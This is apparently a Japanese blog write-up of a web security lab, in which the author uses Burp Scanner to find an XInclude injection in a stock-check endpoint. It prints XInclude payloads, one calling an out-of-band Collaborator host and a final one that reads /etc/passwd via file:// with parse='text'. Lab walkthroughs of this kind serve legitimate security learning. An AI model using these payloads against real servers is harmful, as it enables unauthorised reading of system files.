Shikata Ga Nai

Private? There is no such things.

Discovering vulnerabilities quickly with targeted scanningをやってみた

Hello there, ('ω')ノ

 

ターゲットスキャンを使用して素早く脆弱性を発見するを。

 

このラボには、サーバから任意のファイルを読み取ることができる脆弱性が含まれ。

このラボを解決するには、10分以内に /etc/passwd の内容を取得して。

 

時間が非常に限られているため、Burp Scannerを使用することをお勧めして。

全体のサイトをスキャンして脆弱性を特定することもできますが、

それではラボを解決するための十分な時間が残らない場合があり。

代わりに、脆弱性がありそうなエンドポイントを直感的に特定し、

特定のリクエストに対してターゲットスキャンを実行して。

Burp Scannerが攻撃ベクトルを特定したら、自分自身の専門知識を使って、

それを悪用する方法を見つけることができて。

 

今回の脆弱性のターゲットとなるエンドポイントは、Check stock機能とすることに。

 

 

Check stockのリクエストに対してアクティブスキャンを。

 

 

いくつかの脆弱性が発見され。

アプリケーションが任意の外部 URL のコンテンツを取得して、

それらのコンテンツをレスポンスで返すことができるようで。

その一部のペイロードを利用することに。

 

XIncludeは、http://www.w3.org/2001/XIncludeのinclude要素で

含まれる外部ドキュメントを参照して。

xi:include要素には、含めるファイルを指すURLを含むhref属性があって。

 

<rwp xmlns:xi="http://www.w3.org/2001/XInclude">

<xi:include href="http://nc3qqwn
hvi0zwnids005zmlco3uwim6nufh55u.oastify.com/foo"/>

</rwp>

 

 

/etc/passwdといった課題がでていたので、下記のようにペイロードを変更すると

うまくいかず。

 

<rwp xmlns:xi="http://www.w3.org/2001/XInclude">

<xi:include href="file:///etc/passwd"/>

</rwp>

 

 

parse="text"属性を使用して、未解析の非XMLテキストを含めることができるようで。

下記のようにペイロードを改修してSendすると。


<rwp xmlns:xi="http://www.w3.org/2001/XInclude">

<xi:include parse="text" href="file:///etc/passwd"/>

</rwp>

 

 

クリアできて。

画像は別で実施したものですが。

 

 

Best regards, (^^ゞ